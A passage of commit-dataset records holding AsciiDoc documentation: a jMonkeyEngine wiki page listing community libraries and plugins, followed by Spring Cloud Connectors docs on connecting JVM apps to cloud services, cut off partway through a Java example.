{url-mcentral}q=g:com.github.stephengold%20AND%20a:jme3-utilities-ui[com.github.stephengold:jme3-utilities-ui]\n|{url-github}\/stephengold\/jme3-utilities\/tree\/master\/ui[GitHub]\n\n|https:\/\/stephengold.github.io\/Minie\/minie\/overview.html[Minie]\n|3-D physics simulation\n|{url-forum-user}\/sgold[sgold]\n|\\https:\/\/repo1.maven.org\/maven2 +\n {url-mcentral}q=g:com.github.stephengold%20AND%20a:Minie[com.github.stephengold:Minie]\n|{url-github}\/stephengold\/Minie[GitHub]\n\n|{url-github}\/stephengold\/SkyControl#readme[SkyControl]\n|Sky simulation\n|{url-forum-user}\/sgold[sgold]\n|\\https:\/\/repo1.maven.org\/maven2 +\n {url-mcentral}q=g:com.github.stephengold%20AND%20a:SkyControl[com.github.stephengold:SkyControl]\n|{url-github}\/stephengold\/SkyControl[GitHub]\n\n|{url-github}\/stephengold\/Wes#readme[Wes]\n|Animation editing and retargeting\n|{url-forum-user}\/sgold[sgold]\n|\\https:\/\/repo1.maven.org\/maven2 +\n {url-mcentral}q=g:com.github.stephengold%20AND%20a:Wes[com.github.stephengold:Wes]\n|{url-github}\/stephengold\/Wes[GitHub]\n\n\n|{url-github}\/riccardobl\/jme3-bullet-vhacd#readme[V-HACD Collision Shape Factory]\n|Decompose meshes into convex collision shapes\n|{url-forum-user}\/RiccardoBlb[RiccardoBlb]\n|\\https:\/\/jitpack.io +\n {url-jitpack}\/#riccardobl\/jme3-bullet-vhacd[com.github.riccardobl:jme3-bullet-vhacd]\n|{url-github}\/riccardobl\/jme3-bullet-vhacd[GitHub]\n\n|{url-github}\/riccardobl\/jme-igui#readme[jme-IGUI]\n|Immediate graphical user interface\n|{url-forum-user}\/RiccardoBlb[RiccardoBlb]\n|\\https:\/\/jitpack.io +\n {url-jitpack}\/#riccardobl\/jme-igui[com.github.riccardobl:jme-igui]\n|{url-github}\/riccardobl\/jme-igui[GitHub]\n\n\n|{url-wiki}\/contributions\/gui\/tonegodgui\/tonegodgui.html[ToneGod GUI]\n|Native graphical user interface\n|(none)\n|\\https:\/\/repo1.maven.org\/maven2 +\n {url-mcentral}q=g:com.github.stephengold%20AND%20a:tonegodgui[com.github.stephengold:tonegodgui]\n|{url-github}\/stephengold\/tonegodgui[GitHub]\n\n\n|===\n\n\n== Github Repo\n\nThis is the main repository for jmonkey contributions:\nlink:https:\/\/github.com\/jMonkeyEngine-Contributions[https:\/\/github.com\/jMonkeyEngine-Contributions]\n\n\n== Forum: Contributions\n\nThis is the forum category where you can find other people's contributions or present your own contribution:\nlink:http:\/\/hub.jmonkeyengine.org\/c\/contribution-depot-jme3[http:\/\/hub.jmonkeyengine.org\/c\/contribution-depot-jme3]\n\n\n== Other Repos\n\nThere are other repositories for code sources. A list of weblinks follows:\n\n* link:http:\/\/sourceforge.net\/projects\/jmonkeycsg\/[http:\/\/sourceforge.net\/projects\/jmonkeycsg\/]\n* link:https:\/\/github.com\/davidB\/jme3_skel[https:\/\/github.com\/davidB\/jme3_skel]\n\n\n== Frameworks\n\nThese are premade classes\/functionalities that you can use.\n\nCAUTION: These contributions are developed by jMonkeyEngine users and aren't officially supported by jMonkeyEngine. As such, these projects and the supporting documentation may become stale over time as the contributors lose interest.\n\n=== ImagePainter\n\n[.right.text-left]\nimage::http:\/\/i.imgur.com\/NYtSC.jpg[NYtSC.jpg,width=\"150\",height=\"\"]\n\nA fairly complete set of painting tools for editing jME3 Images from code.\n\n[cols=\"2\", options=\"header\"]\n|===\n\na| *Contact person*\na| {url-forum-user}\/zarch\/activity[zarch]\n\na| *Documentation*\na| link:https:\/\/hub.jmonkeyengine.org\/t\/image-painter-plugin-available\/24255[Forum Post, full javadoc in plugin]\n\na| *Available as SDK plugin*\na| Yes\n\na| *Work in progress*\na| No\n\n|===\n\n\n=== ParticleController\n\n[.right.text-left]\n\nNext Generation Particle Emitters.\n\n[cols=\"2\", options=\"header\"]\n|===\n\na| *Contact person*\na| {url-forum-user}\/zarch\/activity[zarch]\n\na| *Documentation*\na| xref:effect\/particles\/particles.adoc[Wiki Page]\n\na| *Available as SDK plugin*\na| No\n\na| *Work in progress*\na| No\n\n|===\n\n\n=== tonegodGUI\n\n[.right.text-left]\nimage::http:\/\/i.imgur.com\/0Ww1xA7.png[0Ww1xA7.png,width=\"150\",height=\"\"]\n\nA Native +++<abbr title=\"Graphical User Interface\">GUI<\/abbr>+++ Library for JME3\n\n[cols=\"2\", options=\"header\"]\n|===\n\na| *Contact person*\na| {url-forum-user}\/t0neg0d\/activity[t0neg0d]\n\na| *Documentation*\na| xref:gui\/tonegodgui\/tonegodgui.adoc[Wiki Page]\n\na| *Available as SDK plugin*\na| Yes\n\na| *Work in progress*\na| Yes\n\n|===\n\n\n=== Shaderblow\n\n[.right.text-left]\nimage::sdk:plugin\/glass-shader.png[glass-shader.png,width=\"150\",height=\"\"]\n\nThe \"`Shaderblow`\" library contains various shader effects, e.g. refraction, particles, forceshields, grayscale and much more.\n\n[cols=\"2\", options=\"header\"]\n|===\n\na| *Contact person*\na| {url-forum-user}\/mifth\/activity[mifth]\n\na| *Documentation*\na| xref:sdk:plugin\/shaderblow.adoc[Wiki Page]\n\na| *Available as SDK plugin*\na| Yes\n\na| *Work in progress*\na| Yes\n\n|===\n\n=== Zay-ES Entity System\n\n[.right.text-left]\nimage::http:\/\/i.imgur.com\/mQ6Uki9.jpg[mQ6Uki9.jpg,width=\"150\",height=\"\"]\n\nA self-contained thread-capable entity system.\n\n[cols=\"2\", options=\"header\"]\n|===\n\n<a| *Contact person*\na| {url-forum-user}\/pspeed\/activity[Paul Speed (pspeed)]\n\n<a| *Documentation*\n<a| xref:es\/entitysystem\/entitysystem.adoc[Wiki Page]\n\n<a| *Available as SDK plugin*\n<a| Yes\n\n<a| *Work in progress*\n<a| Seems fairly complete\n\n|===\n\n=== Lemur Gui Library\n[.right.text-left]\nimage::https:\/\/camo.githubusercontent.com\/dae08416ac8e7ebf5663dfcf409e8415c3b37a0f79edae535e68c69ae872b33f\/687474703a2f2f692e696d6775722e636f6d2f325075723370472e706e67[lemur,width=\"150\",height=\"\"]\n\nLemur is GUI toolkit for making user interfaces in jMonkeyEngine applications. It supports standard 2D UIs as well as fully 3D UIs. The modular design allows an application to use all or some of it as needed or even to build a completely new custom GUI library on top.\n\n[cols=\"2\", options=\"header\"]\n|===\n\n<a| *Contact person*\na| {url-forum-user}\/pspeed\/activity[Paul Speed (pspeed)]\n\n<a| *Documentation*\n<a| link:https:\/\/github.com\/jMonkeyEngine-Contributions\/Lemur\/wiki[Wiki Page]\n\n<a| *Forum Topic*\n<a| link:https:\/\/hub.jmonkeyengine.org\/c\/user-code-projects\/lemur\/46[Lemur]\n\n<a| *Available as SDK plugin*\n<a| No\n\n<a| *Work in progress*\n<a| Complete library, well maintained and documented with examples.\n|===\n\n== Assets packs\n\n_No contributions yet_\n\n\n== Want to commit something yourself?\n\nIf you have a framework\/assets pack\/whatever you want to contribute, please check out our link:http:\/\/hub.jmonkeyengine.org\/c\/contribution-depot-jme3\/[Contribution Depot].\n\n\n== Forgot something?\n\nWell, this is a wiki page - Please add projects that are available or keep the provided information up-to-date if you want.\n","old_contents":"= Contributions\n:revnumber: 2.0\n:revdate: 2020\/07\/11\n:url-contribs: https:\/\/github.com\/jMonkeyEngine-Contributions\n:url-core: https:\/\/hub.jmonkeyengine.org\/badges\/103\/core-developer\n:url-enginelib: https:\/\/github.com\/jMonkeyEngine\/jmonkeyengine\/tree\/master\n:url-forum-user: https:\/\/hub.jmonkeyengine.org\/u\n:url-github: https:\/\/github.com\n:url-jitpack: https:\/\/jitpack.io\n:url-mcentral: https:\/\/search.maven.org\/search?\n:url-mirrors: https:\/\/github.com\/jMonkeyEngine-mirrors\n:url-wiki: https:\/\/wiki.jmonkeyengine.org\/\n\nThe following list contains additional content for jMonkeyEngine 3 contributed by users. They are, as is the engine itself, open-source - Feel free to download and use them for your projects. :)\n\n\n[TIP]\n====\nTo install a jMonkeyEngine SDK plugin, go to `menu:Tools[Plugins>Available Plugins]`. +\n(Currently only jME 3.0 stable SDK, jME 3.1+ does not yet support plugins)\n====\n\n\n== Libraries with Maven coordinates\n\nJMonkeyEngine projects built using https:\/\/gradle.org\/[Gradle]\nor https:\/\/maven.apache.org\/[Maven]\ncan easily incorporate pre-built libraries from public Maven repositories.\n\n\"GroupID:ArtifactID\" entries link to package information;\nfollow these links to determine the version ID of the latest release.\n\"Name\" entries link to relevant documentation, if any.\n\n[cols=\"20,20,15,35,10\",grid=\"none\",options=\"header\"]\n|===\n|Name\n|Purpose\n|Maintainer(s)\n|Maven repository URL +\n GroupID:ArtifactID\n|Source code\n\n|https:\/\/1337atr.weebly.com\/jttf.html[jME-TTF]\n|Render TrueType fonts\n|(none)\n|\\https:\/\/repo1.maven.org\/maven2 +\n {url-mcentral}q=g:com.github.stephengold%20AND%20a:jme-ttf[com.github.stephengold:jme-ttf]\n|{url-github}\/ATryder\/jME-TTF[GitHub]\n\n\n|{url-github}\/stephengold\/Heart#readme[Heart]\n|General-purpose toolkit\n|{url-forum-user}\/sgold[sgold]\n|\\https:\/\/repo1.maven.org\/maven2 +\n {url-mcentral}q=g:com.github.stephengold%20AND%20a:Heart[com.github.stephengold:Heart]\n|{url-github}\/stephengold\/Heart[GitHub]\n\n|{url-github}\/stephengold\/jme3-utilities#readme[Jme3-utilities-nifty]\n|Graphical user interface\n|{url-forum-user}\/sgold[sgold]\n|\\https:\/\/repo1.maven.org\/maven2 +\n {url-mcentral}q=g:com.github.stephengold%20AND%20a:jme3-utilities-nifty[com.github.stephengold:jme3-utilities-nifty]\n|{url-github}\/stephengold\/jme3-utilities\/tree\/master\/nifty[GitHub]\n\n|{url-github}\/stephengold\/jme3-utilities#readme[Jme3-utilities-ui]\n|Modal hotkeys and help screens\n|{url-forum-user}\/sgold[sgold]\n|\\https:\/\/repo1.maven.org\/maven2 +\n {url-mcentral}q=g:com.github.stephengold%20AND%20a:jme3-utilities-ui[com.github.stephengold:jme3-utilities-ui]\n|{url-github}\/stephengold\/jme3-utilities\/tree\/master\/ui[GitHub]\n\n|https:\/\/stephengold.github.io\/Minie\/minie\/overview.html[Minie]\n|3-D physics simulation\n|{url-forum-user}\/sgold[sgold]\n|\\https:\/\/repo1.maven.org\/maven2 +\n {url-mcentral}q=g:com.github.stephengold%20AND%20a:Minie[com.github.stephengold:Minie]\n|{url-github}\/stephengold\/Minie[GitHub]\n\n|{url-github}\/stephengold\/SkyControl#readme[SkyControl]\n|Sky simulation\n|{url-forum-user}\/sgold[sgold]\n|\\https:\/\/repo1.maven.org\/maven2 +\n {url-mcentral}q=g:com.github.stephengold%20AND%20a:SkyControl[com.github.stephengold:SkyControl]\n|{url-github}\/stephengold\/SkyControl[GitHub]\n\n|{url-github}\/stephengold\/Wes#readme[Wes]\n|Animation editing and retargeting\n|{url-forum-user}\/sgold[sgold]\n|\\https:\/\/repo1.maven.org\/maven2 +\n {url-mcentral}q=g:com.github.stephengold%20AND%20a:Wes[com.github.stephengold:Wes]\n|{url-github}\/stephengold\/Wes[GitHub]\n\n\n|{url-github}\/riccardobl\/jme3-bullet-vhacd#readme[V-HACD Collision Shape Factory]\n|Decompose meshes into convex collision shapes\n|{url-forum-user}\/RiccardoBlb[RiccardoBlb]\n|\\https:\/\/jitpack.io +\n {url-jitpack}\/#riccardobl\/jme3-bullet-vhacd[com.github.riccardobl:jme3-bullet-vhacd]\n|{url-github}\/riccardobl\/jme3-bullet-vhacd[GitHub]\n\n|{url-github}\/riccardobl\/jme-igui#readme[jme-IGUI]\n|Immediate graphical user interface\n|{url-forum-user}\/RiccardoBlb[RiccardoBlb]\n|\\https:\/\/jitpack.io +\n {url-jitpack}\/#riccardobl\/jme-igui[com.github.riccardobl:jme-igui]\n|{url-github}\/riccardobl\/jme-igui[GitHub]\n\n\n|{url-wiki}\/contributions\/gui\/tonegodgui\/tonegodgui.html[ToneGod GUI]\n|Native graphical user interface\n|(none)\n|\\https:\/\/repo1.maven.org\/maven2 +\n {url-mcentral}q=g:com.github.stephengold%20AND%20a:tonegodgui[com.github.stephengold:tonegodgui]\n|{url-github}\/stephengold\/tonegodgui[GitHub]\n\n\n|===\n\n\n== Github Repo\n\nThis is the main repository for jmonkey contributions:\nlink:https:\/\/github.com\/jMonkeyEngine-Contributions[https:\/\/github.com\/jMonkeyEngine-Contributions]\n\n\n== Forum: Contributions\n\nThis is the forum category where you can find other people's contributions or present your own contribution:\nlink:http:\/\/hub.jmonkeyengine.org\/c\/contribution-depot-jme3[http:\/\/hub.jmonkeyengine.org\/c\/contribution-depot-jme3]\n\n\n== Other Repos\n\nThere are other repositories for code sources. A list of weblinks follows:\n\n* link:http:\/\/sourceforge.net\/projects\/jmonkeycsg\/[http:\/\/sourceforge.net\/projects\/jmonkeycsg\/]\n* link:https:\/\/github.com\/davidB\/jme3_skel[https:\/\/github.com\/davidB\/jme3_skel]\n\n\n== Frameworks\n\nThese are premade classes\/functionalities that you can use.\n\nCAUTION: These contributions are developed by jMonkeyEngine users and aren't officially supported by jMonkeyEngine. As such, these projects and the supporting documentation may become stale over time as the contributors lose interest.\n\n=== ImagePainter\n\n[.right.text-left]\nimage::http:\/\/i.imgur.com\/NYtSC.jpg[NYtSC.jpg,width=\"150\",height=\"\"]\n\nA fairly complete set of painting tools for editing jME3 Images from code.\n\n[cols=\"2\", options=\"header\"]\n|===\n\na| *Contact person*\na| {url-forum-user}\/zarch\/activity[zarch]\n\na| *Documentation*\na| link:https:\/\/hub.jmonkeyengine.org\/t\/image-painter-plugin-available\/24255[Forum Post, full javadoc in plugin]\n\na| *Available as SDK plugin*\na| Yes\n\na| *Work in progress*\na| No\n\n|===\n\n\n=== ParticleController\n\n[.right.text-left]\n\nNext Generation Particle Emitters.\n\n[cols=\"2\", options=\"header\"]\n|===\n\na| *Contact person*\na| {url-forum-user}\/zarch\/activity[zarch]\n\na| *Documentation*\na| xref:effect\/particles\/particles.adoc[Wiki Page]\n\na| *Available as SDK plugin*\na| No\n\na| *Work in progress*\na| No\n\n|===\n\n\n=== tonegodGUI\n\n[.right.text-left]\nimage::http:\/\/i.imgur.com\/0Ww1xA7.png[0Ww1xA7.png,width=\"150\",height=\"\"]\n\nA Native +++<abbr title=\"Graphical User Interface\">GUI<\/abbr>+++ Library for JME3\n\n[cols=\"2\", options=\"header\"]\n|===\n\na| *Contact person*\na| {url-forum-user}\/t0neg0d\/activity[t0neg0d]\n\na| *Documentation*\na| xref:gui\/tonegodgui\/tonegodgui.adoc[Wiki Page]\n\na| *Available as SDK plugin*\na| Yes\n\na| *Work in progress*\na| Yes\n\n|===\n\n\n=== Shaderblow\n\n[.right.text-left]\nimage::sdk:plugin\/glass-shader.png[glass-shader.png,width=\"150\",height=\"\"]\n\nThe \"`Shaderblow`\" library contains various shader effects, e.g. refraction, particles, forceshields, grayscale and much more.\n\n[cols=\"2\", options=\"header\"]\n|===\n\na| *Contact person*\na| {url-forum-user}\/mifth\/activity[mifth]\n\na| *Documentation*\na| xref:sdk:plugin\/shaderblow.adoc[Wiki Page]\n\na| *Available as SDK plugin*\na| Yes\n\na| *Work in progress*\na| Yes\n\n|===\n\n=== Zay-ES Entity System\n\n[.right.text-left]\nimage::http:\/\/i.imgur.com\/mQ6Uki9.jpg[mQ6Uki9.jpg,width=\"150\",height=\"\"]\n\nA self-contained thread-capable entity system.\n\n[cols=\"2\", options=\"header\"]\n|===\n\n<a| *Contact person*\na| {url-forum-user}\/pspeed\/activity[Paul Speed (pspeed)]\n\n<a| *Documentation*\n<a| xref:es\/entitysystem\/entitysystem.adoc[Wiki Page]\n\n<a| *Available as SDK plugin*\n<a| Yes\n\n<a| *Work in progress*\n<a| Seems fairly complete\n\n|===\n\n=== Lemur Gui Library\n[.right.text-left]\nimage::https:\/\/camo.githubusercontent.com\/dae08416ac8e7ebf5663dfcf409e8415c3b37a0f79edae535e68c69ae872b33f\/687474703a2f2f692e696d6775722e636f6d2f325075723370472e706e67[lemur,width=\"150\",height=\"\"]\n\nLemur is GUI toolkit for making user interfaces in jMonkeyEngine applications. It supports standard 2D UIs as well as fully 3D UIs. The modular design allows an application to use all or some of it as needed or even to build a completely new custom GUI library on top.\n\n[cols=\"2\", options=\"header\"]\n|===\n\n<a| *Contact person*\na| {url-forum-user}\/pspeed\/activity[Paul Speed (pspeed)]\n\n<a| *Documentation*\n<a| link:https:\/\/github.com\/jMonkeyEngine-Contributions\/Lemur\/wiki[Wiki Page]\n\n<a| *Forum Topic*\n<a| link:https:\/\/hub.jmonkeyengine.org\/c\/user-code-projects\/lemur\/46[Lemur]\n\n<a| *Available as SDK plugin*\n<a| No\n\n<a| *Work in progress*\n<a| Complete library, well maintained and documented with examples.\n|===\n\n== Assets packs\n\n_No contributions yet_\n\n\n== Want to commit something yourself?\n\nIf you have a framework\/assets pack\/whatever you want to contribute, please check out our link:http:\/\/hub.jmonkeyengine.org\/c\/contribution-depot-jme3\/[Contribution Depot].\n\n\n== Forgot something?\n\nWell, this is a wiki page - Please add projects that are available or keep the provided information up-to-date if you want.\n","returncode":0,"stderr":"","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"2f17345c0a9ad3617e2f643bc2065ba338747453","subject":"Rule 17: omit needless words","message":"Rule 17: omit needless words\n","repos":"scottfrederick\/spring-cloud-connectors,spring-cloud\/spring-cloud-connectors,chrisjs\/spring-cloud-connectors,spring-cloud\/spring-cloud-connectors,scottfrederick\/spring-cloud-connectors,chrisjs\/spring-cloud-connectors","old_file":"docs\/src\/main\/asciidoc\/spring-cloud-connectors.adoc","new_file":"docs\/src\/main\/asciidoc\/spring-cloud-connectors.adoc","new_contents":":github-tag: master\n:github-repo: spring-cloud\/spring-cloud-connectors\n:github-raw: http:\/\/raw.github.com\/{github-repo}\/{github-tag}\n:github-code: http:\/\/github.com\/{github-repo}\/tree\/{github-tag}\n:toc: left\n:toclevels: 3\n\n= Spring Cloud Connectors\n\n[[spring-cloud-connectors-install]]\n\n== Introduction\n\nSpring Cloud Connectors provides a simple abstraction for JVM-based applications running on cloud platforms to discover bound services and deployment information at runtime, and provides support for registering discovered services as Spring beans. It is based on a plugin model so that the identical compiled application can be deployed locally or on any of multiple cloud platforms, and it supports custom service definitions through Java Service Provider Interfaces (SPI).\n\nThe Connectors project provides out-of-the-box support for discovering common services on Heroku and Cloud Foundry clouds. It also includes a properties-based connector that can supply configuration for development and testing.\n\n=== Concepts\n\nThe core Connectors concepts are described below.\n\n[cols=\"3,7\", width=\"100%\"]\n|===========================================================================================================================================================================\n|**Cloud Connector** |A platform-specific interface that identifies the presence of the platform and discovers any services bound to the application deployment.\n|**Service Connector** |An object that represents a runtime connection to a service (for example, a `javax.sql.DataSource`).\n|**Service Information** |Information about the underlying service (such as host, port, and credentials).\n|**Application Information** |Information about the application and the particular running instance.\n|===========================================================================================================================================================================\n\n=== Submodules\n\nThe project contains three major submodules.\n\n* **Spring Cloud Connectors Core**: The core library, which is both cloud-agnostic and Spring-agnostic. It provides a programmatic entry point for developers who prefer to access cloud services and application information manually. It also provides basic service definitions for several common services (databases, message queues) and an SPI-based extension mechanism for contributing cloud and service connectors.\n* **Spring Cloud Spring Service Connector**: A Spring library that exposes application information, cloud information, and discovered services as Spring beans of the appropriate type (for example, an SQL service will be exposed as a `javax.sql.DataSource` with optional connection pooling).\n* The cloud connectors:\n ** **Spring Cloud Cloud Foundry Connector**: Connector for link:http:\/\/cloudfoundry.org\/[Cloud Foundry].\n ** **Spring Cloud Heroku Connector**: Connector for link:https:\/\/www.heroku.com\/[Heroku].\n ** **Spring Cloud local-configuration Connector**: Properties-based connector for manually providing configuration information during development or testing. Allows use of the same Spring Cloud configuration wiring in all stages of application deployment.\n\n== Getting Started\n\nSee below for examples of how to include the appropriate dependencies using your build system.\n\n=== Including Cloud Connectors\n\nInclude the connector for each cloud platform which you want to be discoverable. Including multiple connectors is perfectly fine; each connector will determine whether it should be active in a particular environment.\n\nIn Maven, replacing `${VERSION}` with the desired artifact version:\n\n[source,xml]\n----\n<!-- To use Spring Cloud Connectors for development -->\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-localconfig-connector<\/artifactId>\n <version>${VERSION}<\/version>\n<\/dependency>\n\n<!-- If you intend to deploy the app to Cloud Foundry -->\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-cloudfoundry-connector<\/artifactId>\n <version>${VERSION}<\/version>\n<\/dependency>\n\n<!-- If you intend to deploy the app to Heroku -->\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-heroku-connector<\/artifactId>\n <version>${VERSION}<\/version>\n<\/dependency>\n----\n\nIn Gradle, replacing `${VERSION}` with the desired version:\n\n[source,groovy]\n----\ndependencies {\n\n \/\/ To use Spring Cloud Connectors for development\n compile 'org.springframework.cloud:spring-cloud-localconfig-connector:${VERSION}'\n \n \/\/ If you intend to deploy the app to Cloud Foundry\n compile 'org.springframework.cloud:spring-cloud-cloudfoundry-connector:${VERSION}'\n\n \/\/ If you intend to deploy the app to Heroku\n compile 'org.springframework.cloud:spring-cloud-heroku-connector:${VERSION}'\n\n}\n----\n\n=== Spring Applications\n\nIf you're writing a Spring application, include the <<Spring Service Connector>> dependency in addition to your cloud connector dependencies.\n\nIn Maven:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-spring-service-connector<\/artifactId>\n <version>${VERSION}<\/version>\n<\/dependency>\n----\n\nIn Gradle:\n\n[source,groovy]\n----\ndependencies {\n\n compile 'org.springframework.cloud:spring-cloud-spring-service-connector:${VERSION}'\n\n}\n----\n\nThen follow the instructions in the <<Spring Service Connector>> documentation on Spring configuration <<spring-cloud-spring-service-connector.adoc#_the_java_configuration,using Java configuration>> or the <<spring-cloud-spring-service-connector.adoc#_the_code_cloud_code_namespace,`<cloud>` namespace>>.\n\n=== Non-Spring Applications\n\nThe `spring-cloud-core` dependency is included by each cloud connector, so simply include the connectors for the platforms you want. Then follow the <<_spring_cloud_connectors_core,instructions on using the Spring Cloud Connectors API>>.\n\n== Spring Cloud Connectors Core\n\nThis core library provides programmatic access to application and service information. This library has no Spring dependencies and may be used in non-Spring applications.\n\n**This library requires Java 6 or newer.** It is cloud-agnostic; using the Java SPI, it supports pluggable cloud and service connectors. Support for Cloud Foundry and Heroku is available out-of-the-box, in addition to locally-provided configuration for development and testing.\n\n=== Connecting to a Cloud\n\n[NOTE]\n====\nIf you are using Spring Cloud in a Spring application, you should consider <<_spring_service_connector,automatically injecting Spring beans>> instead.\n====\n\n* Include the desired cloud connectors on the runtime classpath, <<_getting_started,as described in the main documentation>>.\n\n* Create a `CloudFactory` instance. Creation of a `CloudFactory` instance is a bit expensive, so we recommend using a singleton instance. If you are using a dependency injection framework such as Spring, create a bean for the `CloudFactory`.\n+\n[source,java]\n----\nCloudFactory cloudFactory = new CloudFactory();\n----\n\n* Obtain the `Cloud` object for the environment in which the application is running.\n+\n[source,java]\n----\nCloud cloud = cloudFactory.getCloud();\n----\n+\nNote that you must have a `CloudConnector` suitable for your deployment environment on your classpath. For example, if you are deploying the application to Cloud Foundry, you must add the <<_cloud_foundry_connector,Cloud Foundry Connector>> to your classpath. If no suitable `CloudConnector` is found, the `getCloud()` method will throw a `CloudException`.\n\n* Use the `Cloud` instance to access application and service information and to create service connectors.\n+\n[source,java]\n----\n\/\/ ServiceInfo has all the information necessary to connect to the underlying service\nList<ServiceInfo> serviceInfos = cloud.getServiceInfos();\n----\n+\n[source,java]\n----\n\/\/ Find the `ServiceInfo` definitions suitable for connecting to a particular service type\nList<ServiceInfo> databaseInfos = cloud.getServiceInfos(DataSource.class);\n----\n+\n[source,java]\n----\n\/\/ Alternatively, let Spring Cloud create a service connector for you\nString serviceId = \"inventory-db\";\nDataSource ds = cloud.getServiceConnector(serviceId, DataSource.class,\n null \/* default config *\/);\n----\n\n== Spring Service Connector\n\nSee <<spring-cloud-spring-service-connector.adoc#,Spring Cloud Spring Service Connector>>.\n\n== Cloud Foundry Connector\n\nSee <<spring-cloud-cloud-foundry-connector.adoc#,Spring Cloud Cloud Foundry Connector>>.\n\n== Heroku Connector\n\nSee <<spring-cloud-heroku-connector.adoc#,Spring Cloud Heroku Connector>>.\n\n== local-configuration Connector\n\nThis connector provides the ability to configure Spring Cloud services locally for development or testing. **The current implementation reads from Java properties only.**\n\n=== Quick Start\n\nSince service URIs contain passwords and should not be stored in code, this connector does not attempt to read service definitions out of the classpath. You can provide service definitions as system properties.\n\n[source,term]\n----\njava -Dspring.cloud.database='mysql:\/\/user:pass@host:1234\/dbname' -jar my-app.jar\n----\n\nYou can also provide service definitions from a configuration properties file, either by setting the `spring.cloud.propertiesFile` system property:\n\n[source,term]\n----\njava -Dspring.cloud.propertiesFile=\/path\/to\/spring-cloud.properties -jar my-app.jar\n----\n\nor by providing the bootstrap properties file `spring-cloud-bootstrap.properties` on the runtime classpath. This file will be inspected only for the property named `spring.cloud.propertiesFile`, and its value will be interpolated from the system properties.\n\n[source,properties]\n----\nspring.cloud.propertiesFile: ${user.home}\/.config\/myApp\/spring-cloud.properties\n----\n\nThe system properties, or the configuration properties file, should contain an application ID and the desired services in the following format.\n\n[source,properties]\n----\nspring.cloud.appId: myApp\n; spring.cloud.{id}: URI\nspring.cloud.database: mysql:\/\/user:pass@host:1234\/dbname\n----\n\nThe service type is determined by the URI scheme. The connector will activate if it finds a property (either in the system properties or in the configuration properties file) named `spring.cloud.appId`.\n\n=== Property Sources\n\nThis connector first attempts to read the system properties generally and a system property named `spring.cloud.propertiesFile` specifically. If the system properties are not readable (if the security manager denies `checkPropertiesAccess`), then they will be treated as empty. If a system property named `spring.cloud.propertiesFile` is found, then that file will be loaded as a property list.\n\n==== Providing a Bootstrap Properties File\n\nTo avoid having to manually configure run configurations or test runners with the path to the configuration properties file, the connector can read a templated filename out of the runtime classpath. This file must be named `spring-cloud-bootstrap.properties` and be located at the classpath root. For security, the connector will not attempt to read any service URIs out of the file. If the connector does find the file, it will read the property `spring.cloud.propertiesFile` and link:http:\/\/commons.apache.org\/proper\/commons-lang\/javadocs\/api-release\/index.html?org\/apache\/commons\/lang3\/text\/StrSubstitutor.html[substitute the pattern `${system.property}`] with the appropriate value from the system properties. The most useful option is generally `${user.home}`.\n\nA configuration properties file specified in the system properties will override any bootstrap file that may be available on the classpath.\n\n==== Property Precedence\n\nTo provide the maximum configuration flexibility, the connector will override any properties (both application ID and service definitions) specified in the file at `spring.cloud.propertiesFile` with system properties defined at runtime. The connector will log a message at `WARN` if you override a service ID.\n\n=== Activating the Connector\n\nSpring Cloud Core expects exactly one cloud connector to match the runtime environment. This connector identifies the “local cloud” by the presence of a property, in a configuration properties file or in the system properties, named `spring.cloud.appId`. This property will be used in the `ApplicationInstanceInfo`.\n\n=== Service Definitions\n\nIf the connector is activated, it will iterate through all of the available properties for keys matching the pattern `spring.cloud.{serviceId}`. Each value is interpreted as a URI to a service, and the type of service is determined from the scheme. Every standard `UriBasedServiceInfo` is supported.\n\n=== Instance ID\n\nThis connector creates a UUID for use as the instance ID, as Java does not provide any portable mechanism for reliably determining hostnames or PIDs.\n\n== Extending Spring Cloud Connectors\n\nBesides the built-in service and cloud support and the included Spring Service Connector, Spring Cloud Connectors can be extended to support additional cloud platforms, cloud services, or application frameworks. See below for details.\n\n=== Adding Cloud Connectors\n\nTo allow Spring Cloud to detect a new cloud platform, add a cloud connector for the platform. A cloud connector determines whether the application is running in the specific cloud, identifies application information (such as the name and instance ID of the particular running instance), and maps bound services (such as URIs exposed in environment variables) as `ServiceInfo` objects.\n\n[TIP]\n====\nSee the https:\/\/github.com\/spring-cloud\/spring-cloud-connectors\/tree\/master\/spring-cloud-cloudfoundry-connector[Cloud Foundry Connector] and https:\/\/github.com\/spring-cloud\/spring-cloud-connectors\/tree\/master\/spring-cloud-heroku-connector[Heroku Connector] for examples.\n====\n\nSpring Cloud uses the https:\/\/docs.oracle.com\/javase\/tutorial\/sound\/SPI-intro.html[Java SPI] to discover available connectors. \n\nYour connector classes must implement the http:\/\/docs.spring.io\/autorepo\/docs\/spring-cloud\/current\/api\/index.html?org\/springframework\/cloud\/CloudConnector.html[`CloudConnector`] interface. It includes three methods:\n\n* `boolean isInMatchingCloud()`: Determines whether the connector is operating in the cloud for which it provides support.\n+\nSpring Cloud Connectors will call `isInMatchingCloud()` on each cloud connector included in an application. The first connector to respond `true` will be activated.\n* `ApplicationInstanceInfo getApplicationInstanceInfo()`: Returns information about the running application instance.\n+\nAn `ApplicationInstanceInfo` must provide the instance id (`String`) and application id (`String`). Other properties can be added as needed to a `Map` and be returned via `getProperties()`.\n* `List<ServiceInfo> getServiceInfos()`: Returns a `ServiceInfo` object for each service bound to the application.\n+\n`getServiceInfos()` can return an empty `List` if no services have been bound to the application.\n\nNew cloud connectors should list the fully-qualified class name in the provider-configuration file at `META-INF\/services\/org.springframework.cloud.CloudConnector`.\n\n=== Adding Service Support\n\nTo allow Spring Cloud to discover a new type of service, create a `ServiceInfo` class containing the information necessary to connect to the service. If your service can be specified via a URI, extend http:\/\/docs.spring.io\/autorepo\/docs\/spring-cloud\/current\/api\/org\/springframework\/cloud\/service\/UriBasedServiceInfo.html[`UriBasedServiceInfo`] and provide the URI scheme in a call to the `super` constructor.\n\nThe following class will expose information for a `HelloWorldService` available at `helloworld:\/\/username:password@host:port\/Bonjour`.\n\n[source,java]\n----\npublic class HelloWorldServiceInfo extends UriBasedServiceInfo {\n public static final String URI_SCHEME = \"helloworld\";\n\n \/\/ Needed to support structured service definitions such as Cloud Foundry's\n public HelloWorldServiceInfo(String id, String host, int port, String username, String password, 